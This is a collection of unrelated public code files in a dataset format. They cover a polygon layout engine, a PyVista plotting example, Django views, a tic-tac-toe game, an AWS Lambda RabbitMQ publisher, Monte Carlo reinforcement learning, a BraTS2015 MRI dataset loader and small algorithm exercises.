p3[0])) / d\n # returns true if the lines intersect (if both 'u' and 'v' are between 0 and 1)\n return (u >= 0) and (v >= 0) and (u <= 1) and (v <= 1)\n\n\n\ndef create_module(l: float, w: float, a_hat: np.array, pos: np.array) -> Polygon:\n \"\"\"function that generates rectangular polygon with a given orientation\n\n Args:\n l (float): length of polygon\n w (float): width of polygon\n a_hat (np.array): alignment vector\n pos (np.array): starting position of the polygon (its bottom left corner)\n\n Returns:\n Polygon: returns a polygon created using the entered length, width, alignment, and starting position\n \"\"\" \n rotated_a_hat = np.array([-a_hat[1], a_hat[0]])\n a_hat_string = str(a_hat)\n a_hat_split_string = re.findall('[0-9]', a_hat_string)\n a_hat_split = (int(a_hat_split_string[0]), int(a_hat_split_string[1]))\n bottom_left = np.array(pos)\n # if a_hat is horizontal (on x-axis (1,0))\n if (a_hat_split[1] == 0 and a_hat_split[0] != 0):\n bottom_right = pos + np.array(a_hat) * w\n top_left = pos + np.array(rotated_a_hat) * l\n top_right = pos + (np.array(rotated_a_hat) * l) + (np.array(a_hat) * w)\n # if a_hat is vertical (on y-axis (0,1))\n if (a_hat_split[0] == 0 and a_hat_split[1] != 0):\n bottom_right = pos + np.array(rotated_a_hat) * l\n top_left = pos + np.array(a_hat) * w\n top_right = pos + (np.array(a_hat) * w) + (np.array(rotated_a_hat) * l)\n # if a_hat is diagonal\n if (a_hat_split[0] != 0 and a_hat_split[1] != 0):\n bottom_right = pos + np.array(a_hat) * w\n top_right = bottom_right + np.array(rotated_a_hat) * l\n top_left = pos + np.array(rotated_a_hat) * l\n # add each vertex to the module\n module_list = [bottom_left.tolist(), bottom_right.tolist(), top_right.tolist(), top_left.tolist()]\n module = Polygon(module_list)\n print(module)\n return module\n\n\n\ndef poly1_inside_poly2(p1: Polygon, p2: Polygon) -> bool:\n \"\"\"function to check if a polygon (p1) is inside of another polygon (p2)\n\n 
Args:\n p1 (Polygon): inside polygon\n p2 (Polygon): outside polygon\n\n Returns:\n bool: returns true if p1 is inside p2\n \"\"\" \n p1 = Polygon(p1)\n p2 = Polygon(p2)\n p1_points = p1.exterior.coords[:]\n for vertex in p1_points:\n if not point_is_inside_polygon(vertex, p2):\n print('poly1 inside poly2: False')\n return False\n print('poly1 inside poly2: True')\n return True\n\n\n\ndef rotate_polygon(a_hat: np.array, vector: np.array, polygon: Polygon) -> Polygon:\n \"\"\"function to rotate the polygon (R) based on the angle between the alignment vector and another vector (x or y axis)\n\n Args:\n polygon (Polygon): polygon (R) to be rotated\n\n Returns:\n Polygon: returns a rotated polygon\n \"\"\" \n dot_product = np.dot(a_hat, vector)\n cosine = dot_product/(norm(a_hat)*norm(vector))\n rotated_polygon = []\n print('dot product:', dot_product)\n print('cosine:', cosine)\n polygon = Polygon(polygon)\n points = polygon.exterior.coords[:]\n for point in points:\n xr = (point[0]*np.cos(cosine)) - (point[1]*np.sin(cosine))\n yr = (point[0]*np.sin(cosine)) + (point[1]*np.cos(cosine))\n rot_matrix = (xr, yr)\n print('rotated matrix:', rot_matrix)\n rotated_polygon.append(rot_matrix)\n print('rotated polygon:', rotated_polygon)\n return rotated_polygon\n\n\n\ndef reverse_rotate_polygon(a_hat: np.array, vector: np.array, polygon: Polygon) -> Polygon:\n \"\"\"rotates polygon (basic bounding box) to original orientation (of polygon (R) inside bounding box)\n\n Args:\n polygon (Polygon): polygon to be rotated back (basic bounding box)\n\n Returns:\n Polygon: returns a polygon (bounding box) oriented along alignment vector\n \"\"\" \n dot_product = np.dot(a_hat, vector)\n cosine = -(dot_product/(norm(a_hat)*norm(vector)))\n reverse_rotated_polygon = []\n print('dot product:', dot_product)\n print('cosine:', cosine)\n polygon = Polygon(polygon)\n points = polygon.exterior.coords[:]\n for point in points:\n xr = (point[0]*np.cos(cosine)) - (point[1]*np.sin(cosine))\n yr = (point[0]*np.sin(cosine)) + (point[1]*np.cos(cosine))\n rot_matrix = (xr, yr)\n print('reverse rotated matrix:', rot_matrix)\n reverse_rotated_polygon.append(rot_matrix)\n print('reverse rotated polygon:', reverse_rotated_polygon)\n return reverse_rotated_polygon\n\n\n\ndef find_bbox_basic(points: Polygon) -> Polygon:\n \"\"\"function to find the basic bounding box with either x or y axis alignment\n\n Args:\n points (np.array): polygon points used to create the bounding box\n\n Returns:\n Polygon: returns a basic bounding box for rotated polygon (rotated R)\n \"\"\" \n x_coords, y_coords = zip(*points)\n basic_case_bbox = Polygon([(min(x_coords), max(y_coords)), (max(x_coords), max(y_coords)), (max(x_coords), min(y_coords)), (min(x_coords), min(y_coords))])\n print(basic_case_bbox)\n return basic_case_bbox\n\n\n\ndef find_bbox(a_hat: np.array, vector: np.array, polygon: Polygon) -> Polygon:\n \"\"\"function to find the smallest box (bounding box) to contain polygon (R) based on alignment vector\n\n Args:\n a_hat (np.array): alignment vector\n R (Polygon): polygon to be bounded\n\n Returns:\n Polygon: returns a bounding box for polygon (R)\n \"\"\"\n a_hat = np.array(a_hat)\n vector = np.array(vector)\n polygon = Polygon(polygon)\n rotated_R = rotate_polygon(a_hat, vector, polygon)\n basic_bbox = find_bbox_basic(rotated_R)\n bbox = Polygon(reverse_rotate_polygon(a_hat, vector, basic_bbox))\n print('bbox:', bbox)\n return bbox\n\n\ndef run_test_cases(func, *args, **kwargs):\n polygon = func(*args, **kwargs)\n plot_polygon(polygon)\n 
return plt.show()\n\n \n\na_hat = [1, 1]\nvector = [1, 0]\nR = [(0, 2.5), (0.5, 2), (1, 1.75), (1.5, 1.5), (2, 1), (1.5, 3)]\nbbox = find_bbox(a_hat, vector, R)\nrun_test_cases(find_bbox, a_hat, vector, R)\n\nl = 2\nw = 1\npos = [1.5, 1.5]\nmodule1 = create_module(l, w, a_hat, pos)\nrun_test_cases(create_module, l, w, a_hat, pos)\npoly1_inside_poly2(module1, R)\n\nl = 0.5\nw = 0.25\npos = [1.25, 2]\nmodule2 = create_module(l, w, a_hat, pos)\nrun_test_cases(create_module, l, w, a_hat, pos)\npoly1_inside_poly2(module2, R)\n","repo_name":"skellikass/ArrayLayoutEnginePython","sub_path":"ArrayLayoutEngine.py","file_name":"ArrayLayoutEngine.py","file_ext":"py","file_size_in_byte":9200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73972490567","text":"import bisect\r\nc = int(input())\r\nfor x in range(c):\r\n n,w = str(input()).split()\r\n w = int(w)\r\n r = str(input()).split()\r\n lista = [None] * len(r)\r\n for i in range(len(r)):\r\n lista[i] = int(r[i])\r\n lista = sorted(lista)\r\n a = 1\r\n come = w\r\n while len(lista) != 0:\r\n z = (bisect.bisect_right(lista, come, hi=len(lista)))\r\n if(z < 1):\r\n come = w\r\n a+= 1\r\n else:\r\n z -= 1\r\n v = lista[z]\r\n come -= v\r\n lista.pop(z)\r\n print(a)","repo_name":"arturbs/algoritmos-Avancados","sub_path":"lista 4 iniciante/C - Box Fitting.py","file_name":"C - Box Fitting.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8807770169","text":"\"\"\".. _plot_spheres_example:\n\nScaled Gaussian Points\n----------------------\nThis example demonstrates how to plot spheres using the ``'points_gaussian'``\nstyle and scale them by a dynamic radius.\n\n\"\"\"\n\nimport numpy as np\n\nimport pyvista as pv\n\n# sphinx_gallery_start_ignore\n# gaussian does not work in VTK.js\nPYVISTA_GALLERY_FORCE_STATIC_IN_DOCUMENT = True\n# sphinx_gallery_end_ignore\n\n###############################################################################\n# First, generate the sphere positions and radii randomly on the edge of a\n# torus.\n\nN_SPHERES = 10_000\ntheta = np.random.default_rng().uniform(0, 2 * np.pi, N_SPHERES)\nphi = np.random.default_rng().uniform(0, 2 * np.pi, N_SPHERES)\ntorus_radius = 1\ntube_radius = 0.3\nradius = torus_radius + tube_radius * np.cos(phi)\nrad = np.random.default_rng().random(N_SPHERES) * 0.01\n\npos = np.zeros((N_SPHERES, 3))\npos[:, 0] = radius * np.cos(theta)\npos[:, 1] = radius * np.sin(theta)\npos[:, 2] = tube_radius * np.sin(phi)\n\n\n###############################################################################\n# Next, create a PolyData object and add the sphere positions and radii as\n# data arrays.\n\npdata = pv.PolyData(pos)\npdata['radius'] = rad\n\n\n###############################################################################\n# Finally, plot the spheres using the ``points_gaussian`` style and scale them\n# by radius.\n\npl = pv.Plotter()\nactor = pl.add_mesh(\n pdata,\n style='points_gaussian',\n emissive=False,\n render_points_as_spheres=True,\n show_scalar_bar=False,\n)\nactor.mapper.scale_array = 'radius'\npl.camera.zoom(1.5)\npl.show()\n\n\n###############################################################################\n# Show the same plot with ``emissive=True``.\n\npl = pv.Plotter()\npl.background_color = 'k'\nactor = pl.add_mesh(\n pdata,\n style='points_gaussian',\n emissive=True,\n render_points_as_spheres=True,\n 
show_scalar_bar=False,\n)\nactor.mapper.scale_array = 'radius'\npl.camera.zoom(1.5)\npl.show()\n","repo_name":"user27182/pyvista","sub_path":"examples/02-plot/points-gaussian-scale.py","file_name":"points-gaussian-scale.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"74750531209","text":"from django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\n\nfrom django.shortcuts import render_to_response\nfrom django.contrib.flatpages.models import FlatPage\n\n# Create your views here.\n\n# The following is the old search method that performs a query of flatpages\n#from django.template import loader, Context\n#def search(request):\n# query = request.GET['q']\n# results = FlatPage.objects.filter(content__icontains=query)\n# template = loader.get_template('search/search.html')\n# contetxt = Context({ 'query': query, 'results': results })\n# response = template.reder(context)\n# return HttpResponse(response)\n \ndef search(request):\n # return query from the submitted form, if no value set default value, empty string\n query = request.GET.get('q', '')\n keyword_results = results = []\n if query:\n keyword_results = FlatPage.objects.filter(searchkeyword__keyword__in=query.split()).distinct()\n if keyword_results.count() == 1:\n return HttpResponseRedirect(keyword_results[0].get_absolute_url())\n results = FlatPage.objects.filter(content__icontains=query)\n return render_to_response('search/search.html',\n { 'query': query,\n 'keyword_results': keyword_results,\n 'results': results })","repo_name":"jrjsb4/CMS---Web-Log---Code-Snippets","sub_path":"cms/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"29516748618","text":"from django.shortcuts import render, redirect\nfrom .forms import DateRangeForm\nimport os\nimport pickle\nimport matplotlib.pyplot as plt\nfrom io import BytesIO\nimport base64\n\ndef Home(request):\n if request.method == 'POST':\n form = DateRangeForm(request.POST)\n if form.is_valid():\n form.save() \n print(\"Start Date\", form.cleaned_data['start_date'])\n print(\"End Date\", form.cleaned_data['end_date'])\n current_directory = os.path.dirname(os.path.abspath(__file__))\n pickle_file_path = os.path.join(current_directory, 'model_sarimax_fit1.pkl')\n model_path = pickle_file_path\n with open(model_path, 'rb') as file:\n loaded_model = pickle.load(file)\n start=form.cleaned_data['start_date']\n end=form.cleaned_data['end_date']\n predictions=loaded_model.predict(start,end)\n print(predictions) \n \n # Create a Matplotlib plot\n plt.figure(figsize=(12, 6))\n plt.plot(predictions, label='SARIMA Predictions', linestyle='--', color='red', marker='o')\n plt.xlabel('Date')\n plt.ylabel('Sales')\n plt.title('SARIMA Predictions')\n plt.grid(True)\n\n # Save the plot as a BytesIO object\n buffer = BytesIO()\n plt.savefig(buffer, format='png')\n buffer.seek(0)\n plt.close()\n\n # Convert the BytesIO object to base64 for embedding in HTML\n plot_data = base64.b64encode(buffer.read()).decode('utf-8')\n \n return render(request, 'Home/index.html', {'form': form, 'plot_data': plot_data}) # Redirect to a success page\n else:\n form = DateRangeForm()\n \n return render(request, 'Home/index.html', {'form': 
form})\n","repo_name":"Deybabu/Django-Champane-DataSet","sub_path":"AirPassanger/Home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14827215448","text":"# Criar o jogo “JOGO DA VELHA”\n# a) Serão dois jogadores\n# b) O jogo pergunta onde você quer jogar e alternar entre os dois jogadores.\n# c) A cada jogada, verifique se a posição esta livre.\n# d) Apresentar no final se teve empate e/ou quem foi o jogador vencedor.\n# Exemplo do jogo:\n# X | 0 |\n# ---+---+---\n# | X | X\n# ---+---+---\n# | | 0\n\n# Exemplo das posições mapeadas para ajudar:\n# 7 | 8 | 9\n# ---+---+---\n# 4 | 5 | 6\n# ---+---+---\n# 1 | 2 | 3\n\nimport time\n\ndef menu():\n print('BEM VINDO(A) AO JOGO DA VELHA')\n time.sleep(1)\n iniciar = 1\n while iniciar:\n iniciar = int(input('O que você deseja fazer? 1 - Jogar ou 0 - Sair \\n'))\n time.sleep(1)\n\n if iniciar:\n jogar()\n else:\n print('Até a próxima!')\n\n\ntabuleiro = [[0,0,0],\n [0,0,0],\n [0,0,0]]\n\ndef exibeTabuleiro():\n for i in range(3):\n for j in range(3):\n if tabuleiro[i][j] == 0:\n print('_', end=' ')\n elif tabuleiro[i][j] == 1:\n print('X', end=' ')\n elif tabuleiro[i][j] == -1:\n print('O', end=' ')\n print()\n\ndef ganhou():\n for i in range(3):\n soma = tabuleiro[i][0] + tabuleiro[i][1] + tabuleiro[i][2]\n if soma == 3 or soma == -3:\n return True\n \n for j in range(3):\n soma = tabuleiro[0][j] + tabuleiro[1][j] + tabuleiro[2][j]\n if soma == 3 or soma == -3:\n return True\n\n diagonal1 = tabuleiro[0][0] + tabuleiro[1][1] + tabuleiro[2][2]\n diagonal2 = tabuleiro[2][0] + tabuleiro[1][1] + tabuleiro[0][2]\n if diagonal1 == 3 or diagonal1 == -3 or diagonal2 == 3 or diagonal2 == -3:\n return True\n \n return False\n\ndef jogar():\n jogadas = 0\n print('Esse é o gabarito de posições:')\n print(' 1 2 3\\n 4 5 6 \\n 7 8 9')\n global tabuleiro \n tabuleiro = [[0,0,0],\n [0,0,0],\n [0,0,0]]\n \n while not ganhou():\n if jogadas == 9:\n print('Os jogadores empataram.')\n break\n print('\\nJogador ', jogadas % 2 + 1)\n print('--------------')\n exibeTabuleiro()\n posicao = int(input('\\nEm qual posição deseja jogar? 
[1 a 9]:'))\n linha = (posicao - 1) // 3\n coluna = (posicao -1) % 3\n if tabuleiro[linha][coluna] == 0:\n if(jogadas % 2 + 1)== 1:\n tabuleiro[linha][coluna] = 1\n else:\n tabuleiro[linha][coluna] = -1\n else:\n print('Essa posição não está livre')\n jogadas -= 1\n\n if ganhou():\n print('O jogador ',jogadas % 2 + 1,' ganhou!')\n print('Parabéns!')\n\n jogadas +=1\n\nmenu()","repo_name":"kellina/python","sub_path":"jogo-da-velha/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"957411352","text":"import os\nimport traceback\n\nimport pika\nimport psycopg2\n\nfrom pika.adapters.blocking_connection import BlockingChannel\nfrom cerberus import validator\nfrom typing import List\nimport json\nimport logging\n\nlog = logging.getLogger()\nlogging.basicConfig(level=logging.WARNING)\n\n\ndef provide_amqp(amqp_url) -> BlockingChannel:\n if not hasattr(provide_amqp, '_conn'):\n provide_amqp._conn = pika.BlockingConnection(pika.URLParameters(amqp_url))\n provide_amqp._channel = provide_amqp._conn.channel()\n\n return provide_amqp._channel\n\n\ndef provide_db(db_dsn: str):\n if not hasattr(provide_db, '_conn'):\n provide_db._conn = psycopg2.connect(db_dsn)\n\n table_sql = \"\"\"\n create table if not exists events (\n ts timestamp, \n payload TEXT,\n queue TEXT,\n success boolean,\n error TEXT\n )\n \"\"\"\n with provide_db._conn:\n with provide_db._conn.cursor() as cur:\n cur.execute(table_sql)\n\n return provide_db._conn\n\n\ndef send_messages_handler(channel: BlockingChannel, db_conn, request):\n schema = {\n 'payload': {'type': 'string', 'required': True},\n 'routing_keys': {'type': 'list', 'required': True, 'schema': {\n 'type': 'string'\n }}\n }\n\n v = validator.Validator(schema, allow_unknown=True)\n if not v.validate(request):\n raise ValueError('Invalid request: {}'.format(v.errors))\n\n payload = request['payload'] # type: str\n routing_keys = request['routing_keys'] # type: List[str]\n\n success_count = 0\n failed_count = 0\n insert_data = []\n for rk in routing_keys:\n try:\n channel.basic_publish('', rk, payload.encode('utf-8'))\n insert_data.append((payload, rk, True, None))\n success_count += 1\n except:\n log.exception('Failed to publish msg to queue %s', rk)\n insert_data.append((payload, rk, False, traceback.format_exc()))\n failed_count += 1\n\n try:\n with db_conn:\n with db_conn.cursor() as cur:\n cur.executemany('insert into events(ts, payload, queue, success, error) '\n 'values (now(), %s, %s, %s, %s)', insert_data)\n except:\n log.exception('Failed to commit publish log to postgresql. 
Ignored.')\n\n return {\n 'success_count': success_count,\n 'failed_count': failed_count,\n }\n\n\ndef main(event, context):\n amqp_url = os.environ.get('AMQP_URL', None)\n if not amqp_url:\n raise RuntimeError('AMQP_URL must be set')\n\n db_url = os.environ.get('POSTGRESQL_DB_URL', None)\n if not db_url:\n raise RuntimeError('POSTGRESQL_DB_URL must be set')\n\n amqp_channel = provide_amqp(amqp_url)\n db_conn = provide_db(db_url)\n\n request = json.loads(event['body'])\n\n try:\n data = send_messages_handler(amqp_channel, db_conn, request)\n except Exception as escp:\n log.exception('Failed to process request: %s', request)\n\n return {\n 'status_code': 200,\n 'body': json.dumps({\n 'success': False,\n 'error': '{}: {}'.format(str(escp.__class__.__name__), str(escp)),\n 'traceback': traceback.format_exc(),\n })\n }\n\n response = {\n 'success': True,\n }\n if data:\n response['result'] = data\n\n return {\n 'statusCode': 200,\n 'body': json.dumps(response)\n }\n\n\ndef auth(event, context):\n ALLOWED_TOKENS = ['teststatictoken']\n\n auth_token = event.get('authorizationToken', '')\n method_arn = event.get('methodArn', '')\n\n return {\n 'principalId': 'test',\n 'policyDocument': {\n 'Version': '2012-10-17',\n 'Statement': [\n {\n \"Action\": \"execute-api:Invoke\",\n \"Effect\": \"Allow\" if auth_token in ALLOWED_TOKENS else \"Deny\",\n \"Resource\": method_arn\n }\n ]\n },\n # 'context': context,\n }\n\n\nif __name__ == \"__main__\":\n for i in range(2):\n ret = main({\n 'body': json.dumps({\n \"payload\": \"any_string\",\n \"routing_keys\": [\n \"key1\",\n \"key2\"\n ]\n })\n }, '')\n print(json.dumps(ret))\n","repo_name":"styleex/aws-lambda-example","sub_path":"lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72034810247","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Set work directory\nimport os\nos.getcwd()\nos.chdir(\"C:\\\\Users\\\\Bryan\\\\Desktop\\\\\")\nos.getcwd()\n\n# Import packages\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom pymining import itemmining, assocrules\n\nimport ast\n\n\n# In[ ]:\n\n\n#data importing\ndf = pd.read_csv('aaa.csv')\ndf.head(100)\n\n\n# In[20]:\n\n\n#get the model input - freq (a series: index is order number ) \ndf = df.rename(columns = {'日历日(YYYY-MM-DD)':'日期','类别描述':'商品类别'})\ndf['日期'] = pd.to_datetime(df['日期'])\ndf = df[(df['日期']>='2020/08/28')&(df['日期']<='2020-09-29')]\ndf.head()\n\n# groupby combine str\n#freq = df.groupby('零售小票编号')['类别描述'].apply(lambda x: \"[%s]\" % ','.join(x))\nfreq = df.groupby('零售小票编号')['商品类别'].apply(lambda x: ','.join(x))\nfreq = freq.map(lambda x: x.strip(',').split(','))\n\n\n# In[56]:\n\n\nrelim_input = itemmining.get_relim_input(freq)\nreport = itemmining.relim(relim_input, min_support=30)\nreport\n\n\n# In[57]:\n\n\nrules1 = assocrules.mine_assoc_rules(report, min_support=30, min_confidence=0.5)\nrules1\n\n\n# In[58]:\n\n\na = []\nfor line in rules1:\n ## (len(line[0])>1 or len(line[1])>1) could be added for filtering - k-itme set>2 ##\n if ('未知'not in line[0] and '未知'not in line[1]):\n a.append(line)\n\n\n# In[59]:\n\n\nresult = pd.DataFrame(a, columns = ['first_set', 'second_set', 'support','confidence'])\nresult.head()\n\n\n# In[60]:\n\n\nsets = 
result['second_set']\n\na = [list(x) for x in sets]\n\na\n\n\n# In[61]:\n\n\nsets = [frozenset({'a', 'c,'}), frozenset({'h,', 'a,'})]\n\na = [list(x) for x in sets]\n\na\n\n\n# In[62]:\n\n\nresult.sort_values(by = 'confidence', ascending = False).head(20)\n\n\n# In[63]:\n\n\nresult.sort_values(by = 'support', ascending = False)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Pwnb/association_rule","sub_path":"association_rule.py","file_name":"association_rule.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3585283119","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 25 20:09:39 2019\n\n@author: sakirahas\n\nQ = random\npi = random\n\nwhile True:\n s, a = randomly select from S and A\n states_actions_returns = play_game(start=(s,a))\n for s, a, G in states_actions_returns:\n returns(s, a).append(G)\n Q(s, a) = average(returns(s, a))\n for s in states:\n pi(s) = argmax[a]{Q(s, a)}\n\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom grid_world import standard_grid, negative_grid\nfrom iterative_policy_evaluation import print_values, print_policy\n\nSMALL_ENOUGH = 10e-4\nGAMMA = 0.9\nALL_POSSIBLE_ACTIONS = ('U', 'D', 'L', 'R')\n\n\ndef play_game(grid, policy):\n \n start_states = list(grid.actions.keys())\n start_index = np.random.choice(len(start_states))\n grid.set_state(start_states[start_index])\n \n s = grid.current_state()\n a = np.random.choice(ALL_POSSIBLE_ACTIONS)\n \n \n states_actions_rewards = [(s, a, 0)]\n seen_states = set()\n seen_states.add(grid.current_state())\n num_steps = 0\n \n while True:\n \n #old_s = grid.current_state()\n print(a)\n r = grid.move(a)\n num_steps += 1\n \n s = grid.current_state()\n \n #if old_s == s:\n if s in seen_states:\n reward = -10./num_steps\n states_actions_rewards.append([s, None, -100])\n #states_actions_rewards.append((s, None, reward))\n break\n elif grid.game_over():\n states_actions_rewards.append((s, None, r))\n break\n else:\n a = policy[s]\n states_actions_rewards.append((s, a, r))\n seen_states.add(s)\n # compute the return\n G = 0\n states_actions_returns = []\n \n first = True\n \n for s, a, r in reversed(states_actions_rewards):\n if first:\n first = False\n else:\n states_actions_returns.append((s, a, G))\n \n G = r + GAMMA * G\n states_actions_returns.reverse()\n \n return states_actions_returns\n\n\n\ndef max_dict(d):\n max_key = None\n max_val = float('-inf')\n \n for k, v in d.items():\n if v > max_val:\n max_val = v\n max_key = k\n return max_key, max_val\n\n\n\n \ndef random_actions_states(s, a):\n \n p = np.random.random()\n \n if p < 0.5:\n return (s, a)\n else:\n tmp = list(ALL_POSSIBLE_ACTIONS)\n tmp.remove(a)\n a = np.random.choice(tmp)\n \n return (s, a)\n\nif __name__ == '__main__':\n \n grid = standard_grid()\n grid = negative_grid(step_cost=-0.9)\n \n \n print('rewards')\n print_values(grid.rewards, grid)\n \n \n # initialize a random policy\n \n policy = {}\n \n for s in grid.actions.keys():\n policy[s] = np.random.choice(ALL_POSSIBLE_ACTIONS)\n \n \n \n print('policy')\n print_policy(policy, grid)\n \n Q = {}\n returns = {}\n \n states = grid.all_states()\n actions = grid.actions\n \n for s in states:\n if s in grid.actions:\n Q[s] = {}\n for a in ALL_POSSIBLE_ACTIONS:\n Q[s][a] = 0\n returns[(s, a)] = []\n else:\n pass\n \n # repeat until convergence\n deltas = []\n \n for t in range(2000):\n \n if t%1000 == 0:\n print(t)\n \n biggest_change = 0\n# \n# 
states_actions_returns = play_game(start=(s,a))\n# for s, a, G in states_actions_returns:\n# returns(s, a).append(G)\n# Q(s, a) = average(returns(s, a))\n# for s in states:\n# pi(s) = argmax[a]{Q(s, a)}\n \n print('At t:', t)\n print(policy)\n \n states_actions_returns = play_game(grid, policy)\n # create a set\n seen_state_action_pairs = set()\n for s, a, G in states_actions_returns:\n \n sa = (s, a)\n if sa not in seen_state_action_pairs:\n old_Q = Q[s][a]\n returns[sa].append(G)\n Q[s][a] = np.mean(returns[sa])\n seen_state_action_pairs.add(sa)\n \n biggest_change = max(biggest_change, np.abs(old_Q - Q[s][a]))\n deltas.append(biggest_change)\n \n for s in policy.keys():\n #policy[s] = np.argmax(Q[s])\n policy[s] = max_dict(Q[s])[0]\n \n \n plt.plot(deltas)\n plt.show()\n \n print('final policy')\n print_policy(policy, grid)\n \n\n\n # find V\n V = {}\n for s, Qs in Q.items():\n V[s] = max_dict(Q[s])[1]\n \n print('final value')\n print_values(V, grid)","repo_name":"sakira/UdemyReinforcementLearning","sub_path":"monte_carlo_control.py","file_name":"monte_carlo_control.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18605624513","text":"import os\nfrom glob import glob\n\nimport SimpleITK as sitk\nimport numpy as np\nimport random\nimport re\nimport shutil\nfrom torchvision.transforms import Compose, CenterCrop, Normalize, ToTensor, Scale, Resize\nfrom .base import BaseDataset\n\n\nmha_save_path = r\"./mha_save_path/\"\nmha_ground_truth = mha_save_path + \"mha_ground_truth/\"\nmha_result = mha_save_path + \"mha_result/\"\n\n\nclass BraTS2015(BaseDataset):\n IN_CHANNELS = 4\n NUM_CLASS = 5\n CROP_SIZE = 256\n CLASS_WEIGHTS = None\n\n def __init__(self, root, split='train', mode='train'):\n basePath = r'/home/soap/code/data/BRATS2015_slice_all'\n self.mode = mode\n self.bra_path = []\n self.OT_path = []\n self.Flair_path = []\n self.T1_path = []\n self.T1c_path = []\n self.T2_path = []\n\n for LorH in os.listdir(basePath + '/Training'):\n path = os.path.join(basePath, 'Training', LorH)\n for filename in os.listdir(path):\n braPath = os.path.join(path, filename)\n self.bra_path.append(braPath)\n\n random.shuffle(self.bra_path)\n num_dataset = len(self.bra_path)\n split = int(num_dataset * 0.8)\n train_path = self.bra_path[0:split]\n val_path = self.bra_path[split:num_dataset]\n test_path = self.bra_path[0:5]\n\n if mode == 'train':\n self.T1_path, self.T1c_path, self.Flair_path, self.T2_path, self.OT_path = self.read_data(train_path)\n elif mode == 'val':\n self.T1_path, self.T1c_path, self.Flair_path, self.T2_path, self.OT_path = self.read_data(val_path)\n elif mode == 'test':\n self.T1_path, self.T1c_path, self.Flair_path, self.T2_path, self.OT_path = self.read_data(test_path)\n\n def __getitem__(self, index):\n\n if self.mode == \"train\":\n ot = self.OT_path[index]\n t1 = self.T1_path[index]\n t2 = self.T2_path[index]\n t1c = self.T1c_path[index]\n flair = self.Flair_path[index]\n elif self.mode == 'val':\n ot = self.OT_path[index]\n t1 = self.T1_path[index]\n t2 = self.T2_path[index]\n t1c = self.T1c_path[index]\n flair = self.Flair_path[index]\n elif self.mode == 'test':\n ot = self.OT_path[index]\n t1 = self.T1_path[index]\n t2 = self.T2_path[index]\n t1c = self.T1c_path[index]\n flair = self.Flair_path[index]\n\n label = self.read_label(ot)\n image_array_t1 = self.read_image(t1)\n image_array_t2 = self.read_image(t2)\n image_array_t1c = self.read_image(t1c)\n image_array_flair 
= self.read_image(flair)\n image = np.concatenate((image_array_flair, image_array_t1, image_array_t1c, image_array_t2), axis=-1)\n\n image = self.input_transform()(image)\n label = ToTensor()(label)\n\n return image, label\n \n def __len__(self):\n return len(self.OT_path)\n\n @staticmethod\n def input_transform():\n return Compose([\n ToTensor(),\n # flair,t1,t1c,t2\n Normalize(\n mean=[0.2007713, 0.28985304, 0.31852704, 0.36998123],\n std=[0.59269184, 0.9364896, 1.0523965, 1.1754125]\n ),\n # ToTensor()\n ])\n \n @staticmethod\n def read_image(file_name, format=None):\n mha = sitk.ReadImage(file_name)\n image = sitk.GetArrayFromImage(mha)\n image = np.expand_dims(image, -1)\n return image\n\n @staticmethod\n def read_label(file_name, dtype='float'):\n # In some cases, `uint8` is not enough for label\n mha = sitk.ReadImage(file_name)\n image = sitk.GetArrayFromImage(mha)\n # image = np.expand_dims(image, -attention)\n return np.asarray(image, dtype=dtype)\n\n def read_data(self, brapath):\n\n T1_path = []\n T1c_path = []\n Flair_path = []\n T2_path = []\n OT_path = []\n for path in brapath:\n T1_path = T1_path + sorted(glob(path + '/*T1.*/*.gz'), key=lambda name: name[-11:-7])\n T1c_path = T1c_path + sorted(glob(path + '/*T1c.*/*.gz'), key=lambda name: name[-11:-7])\n Flair_path = Flair_path + sorted(glob(path + '/*Flair.*/*.gz'), key=lambda name: name[-11:-7])\n T2_path = T2_path + sorted(glob(path + '/*T2.*/*.gz'), key=lambda name: name[-11:-7])\n OT_path = OT_path + sorted(glob(path + '/*OT.*/*.gz'), key=lambda name: name[-11:-7])\n\n return T1_path, T1c_path, Flair_path, T2_path, OT_path\n\n","repo_name":"qinjinguestc/pnas-nni","sub_path":"refer/BraTS2015.py","file_name":"BraTS2015.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30687789007","text":"import pytest\n\nfrom adventofcode2023.day11 import Day11PartB\n\n\nclass TestDay11PartB:\n @pytest.mark.parametrize(\n (\"factor\", \"expected_result\"),\n [\n (10, 1030),\n (100, 8410),\n ],\n )\n def test_day11b_testdata(self, testdata, factor, expected_result):\n solution = Day11PartB()\n solution.parse(testdata)\n solution.expand_universe(factor - 